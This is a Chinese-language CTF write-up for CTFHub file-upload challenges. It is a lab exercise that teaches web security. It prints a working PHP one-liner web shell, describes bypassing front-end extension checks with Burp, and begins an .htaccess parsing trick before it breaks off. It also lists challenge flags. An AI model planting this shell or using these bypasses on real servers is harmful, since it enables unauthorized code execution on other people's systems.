目录
3、解题:上传htaccess文件==》上传符合我们重新后规则的文件==》蚁剑连接
知识点
1、文件上传漏洞的前提条件:
(1)、可以成功上传木马;
(2)、上传成功的木马能够解析;
(3)、我们知道上传之后文件的路径;
2、当php文件被过滤,可以尝试图片马;
3、文件上传的防御:
(1)、上传后的文件重新命名;
(2)、不进行解析;
(2)、重新生成文件。
一、无验证
1、这里对文件没有限制,所以我们直接上传一句话木马
<?php @eval($_POST[admin]);?>
2、上传成功后给出相对路径,所以直接拿出蚁剑或者菜刀进行连接
3、连接成功后,查看目录,获取flag
拿下flag: ctfhub{5a9ca5dff20570539153fad1}
二、前端验证
1、绕过方法:改后缀找漏网,burp抓包改后缀。
2、题目简介
查看源代码
白名单验证,只验证文件后缀,且只能上传.jpg、.png、.gif
3、 burp抓包,由于是前端认证,所以我们将木马后缀改为.jpg,burp抓包放过时改为.php
(1)、将一句话木马后缀改为png
(2)、点击上传,burp改后缀
后缀改为php且上传成功获取到路径。
3、蚁剑测试连接
4、获取flag
flag:ctfhub{c8233e314667d80cf9c1f230}
三、.htaccess
1、题目简介
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能;
2、解题思路
根据题目以及题目源码过滤了php,因此这道题解题思路如下:
上传一个.htaccess文件,替换掉本地服务器上的源文件,重写规则,是我们能够上传脚本。
(1)、上传一个.htaccess文件,让文件名中含有数字‘6’的文件当作php文件解析;
#.htaccess文件内容
<